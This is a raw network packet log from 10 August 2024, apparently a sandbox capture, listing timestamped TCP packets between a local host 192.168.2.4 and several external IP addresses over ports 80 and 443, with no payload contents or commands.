Aug 10, 2024 16:12:23.030124903 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.030134916 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.030148983 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.030157089 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.030169964 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.030174971 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.030194044 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.030225039 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.030277014 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.030325890 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.030425072 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.030436993 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.030445099 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:23.030457020 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.030469894 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.030477047 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.030513048 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:23.030623913 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.030908108 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.030919075 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.030929089 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.030941963 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.030951977 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.030961037 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.030972958 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.030981064 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.030993938 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.030998945 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.031008959 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.031016111 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.031025887 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.031033039 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.031040907 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.031048059 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.031061888 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.031068087 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.031084061 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.031095982 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.031807899 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.031824112 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.031835079 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.031847954 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.031857014 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.031867981 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.031873941 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.031883955 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.031892061 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.031902075 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.031913996 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.031922102 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.031933069 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.031945944 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.031950951 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.031960011 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.031968117 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.031985998 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.031999111 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.032227993 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.032238960 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.032248974 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.032273054 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.032279015 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.032289028 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.032295942 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.032305956 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.032318115 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.032324076 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.032334089 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.032346010 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.032354116 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.032365084 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.032371044 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.032388926 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.032406092 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.033062935 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.033072948 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.033082962 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.033093929 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.033107996 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.033113956 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.033124924 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.033130884 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.033143044 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.033154011 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.033160925 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.033173084 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.033179998 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.033190012 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.033200979 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.033207893 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.033216953 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.033225060 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.033248901 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.033868074 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.033880949 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.033890963 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.033902884 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.033912897 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.033924103 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.033946991 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.045504093 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.045568943 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:23.049587011 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.049710035 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.094480038 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.094502926 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.094513893 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.094553947 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.094628096 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.094715118 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.094726086 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.094738007 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.094849110 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.094849110 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.094894886 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.094906092 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.094933987 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.095016956 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.095046043 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.095057011 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.095089912 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.095150948 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.095216036 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.095227003 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.095237017 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.095247984 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.095257998 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.095258951 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.095406055 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.095406055 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.095637083 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.095648050 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.095658064 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.095669985 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.095679998 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.095690012 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.095690012 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.095701933 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.095712900 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.095742941 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.095742941 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.095771074 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.096271038 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.096282005 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.096292019 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.096353054 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.096353054 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.096436024 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.096477032 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.096681118 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.096693039 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.096703053 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.096713066 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.096724033 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.096735001 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.096745968 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.096755981 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.096766949 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.096776962 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.096787930 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.096797943 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.096797943 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.096797943 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.096797943 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.096797943 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.096808910 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.096820116 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.096831083 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.096860886 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.096860886 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.096860886 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.097418070 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.097580910 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.097606897 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.097618103 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.097629070 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.097640991 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.097651958 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.097661972 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.097661972 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.097671986 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.097682953 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.097682953 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.097693920 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.097704887 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.097714901 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.097724915 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.097735882 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.097743034 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.097743034 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.097743034 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.097748041 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.097759008 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.097764015 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.097815037 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.098573923 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.098584890 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.098593950 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.098603964 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.098613977 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.098623991 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.098634005 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.098645926 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.098655939 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.098668098 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.098679066 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.098690033 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.098701000 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.098701954 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.098701954 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.098701954 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.098701954 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.098711967 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.098731995 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.098829031 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.098829031 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.098829031 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.099373102 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.099385023 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.099395037 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.099407911 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.099419117 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.099431038 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.099441051 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.099585056 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.099585056 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.099755049 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.099765062 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.099775076 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.099786997 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.099798918 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.099809885 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.099822044 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.099831104 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.099831104 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.099868059 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.099868059 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.100229979 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.100240946 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.100250959 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.100263119 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.100275040 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.100286007 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.100296974 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.100321054 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.100325108 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.100325108 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.100325108 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.100325108 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.100334883 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.100344896 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.100357056 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.100404978 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.100404978 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.100404978 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.100867987 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.100879908 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.100892067 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.100903034 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.100913048 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.100924015 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.100930929 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.100934982 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.100944996 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.100946903 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.100958109 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.100966930 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.101001024 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.101001024 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.101274014 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.101315975 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.101391077 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.101401091 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.101421118 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.101437092 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.101444960 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.101454973 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.101491928 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.101574898 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.101584911 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.101630926 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.103817940 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.103825092 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.103993893 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.104002953 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.116559029 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.116605997 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.116744995 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.116755962 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.116766930 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.116779089 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.116790056 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.116796970 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.116808891 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.116816998 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.116832972 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.116856098 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.117153883 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.117163897 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.117173910 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.117183924 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.117196083 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.117203951 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.117213011 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.117223024 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.117229939 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.117238998 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.117247105 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.117263079 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.117268085 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.117283106 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.117300034 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.117507935 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.122224092 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.136419058 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:23.136442900 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.136831045 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.136884928 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:23.137212992 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:23.151949883 CEST	443	49750	162.0.209.124	192.168.2.4
Aug 10, 2024 16:12:23.152101040 CEST	443	49750	162.0.209.124	192.168.2.4
Aug 10, 2024 16:12:23.152232885 CEST	49750	443	192.168.2.4	162.0.209.124
Aug 10, 2024 16:12:23.152487040 CEST	49750	443	192.168.2.4	162.0.209.124
Aug 10, 2024 16:12:23.152496099 CEST	443	49750	162.0.209.124	192.168.2.4
Aug 10, 2024 16:12:23.180499077 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.185239077 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.185250998 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.185261011 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.185316086 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.185328007 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.185328007 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.185328007 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.185370922 CEST	80	49740	147.45.44.104	192.168.2.4
